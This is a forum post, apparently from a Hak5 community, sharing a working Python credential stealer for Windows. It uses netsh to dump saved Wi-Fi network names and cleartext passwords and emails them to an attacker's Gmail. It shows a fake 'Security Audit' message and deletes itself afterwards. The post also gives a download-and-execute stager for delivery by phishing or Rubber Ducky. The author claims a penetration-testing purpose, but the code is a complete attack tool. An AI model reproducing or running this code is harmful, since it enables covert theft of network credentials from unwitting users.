thegrizzlyonedge

I posted this in a seperate HAK5 forum room. How do you think is the best way to deploy this code? I tested it on a Windows 10 machine. It writes all SSID and Credentials to a temp file, then emails it to the attacker.

I want to be able to use the above code in a Penetration Testing Engagement, either via Phishing or Rubber Ducky. Here is what I did to test it. # Create a local directory to act as the "malicious_server" # In cmd.exe go to "malicious_server" directory C:\> cd $filepath\malicious_server # I'm using python3.6, standup a http.server C:\filepath\malicious_server>python -m http.server 8080 # Next, we can probably make this into a oneliner and apply it to a rubber ducky or phishing attack #!/usr/bin/env python import urllib.request import os import subprocess filename = os.path.expanduser(path='~\Downloads\wifipw.py') urllib.request.urlretrieve('http://127.0.0.1:8080/wifipw.py', filename) subprocess.call(filename, shell=True) # An example of the outcome will be something like the following in an email: ssid_name1 | password1 ssid_name2 | password2 ssid_name3 | password3 The script will automatically remove itself from the system.

So I wanted to convince an enterprise of the importance of EAP-TLS for enterprise wireless access points that support sensitive systems. I'm sure many of you have come across companies that use username and password for their companies access points. I'm fairly new at writing python scripts so please bare with. Credit goes out to youtube channel "pytutorials" for the wifi_passwords function. # Tested on Windows 10 - with McAfee AntiVirus # Runs a subprocess - netsh and identifies SSID names and Passwords # Packages the findings and sends wireless SSIDs and Credentials to an email # Requirements ## Sender Gmail Email Address ## Sender Gmail API Key ## Email address of the person receiving the SSID names and Credentials How can we package this into a Rubber Ducky? #!/usr/bin/env python import subprocess import tempfile import time import smtplib from email.mime.text import MIMEText from os import remove from sys import argv print('Security Audit will take one minute') # from_address = Senders email address from_address = 'who_it_is_from_email_address_here' # to_address = Receivers email address to_address = 'receiver_email_address_here' # api_key = Gmail API key api_key = 'who_it_is_from_gmail_api_key_here' #Create a temporary file to write SSID and wifi_passwords fp = tempfile.TemporaryFile(mode='w+t') def wifi_passwords(): "This writes to tempfile SSID and Password" a = subprocess.check_output(['netsh', 'wlan', 'show', 'profiles']).decode('utf-8').split('\n') a = [i.split(":")[1][1:-1] for i in a if "All User Profile" in i] for i in a: results = subprocess.check_output(['netsh', 'wlan', 'show', 'profile', i, 'key=clear']).decode('utf-8').split('\n') results = [b.split(":")[1][1:-1] for b in results if "Key Content" in b] try: fp.write(str("{:<30}| {:<}\n".format(i, results[0]))) except IndexError: fp.write(str("{:<30}| {:<}\n".format(i, ""))) except KeyboardInterrupt: print("User stopped program!") fp.seek(0) def send_message(): "Sends an email with SSIDs and Creds" msg = MIMEText(fp.read()) msg['From'] = from_address msg['To'] = to_address msg['Subject'] = 'SSIDs and Creds' server = smtplib.SMTP('smtp.gmail.com', 587) server.starttls() server.login(user=msg['From'], password=api_key) server.send_message(msg) server.quit() wifi_passwords() send_message() fp.close() # Below self destructs the python script when executed remove(argv[0])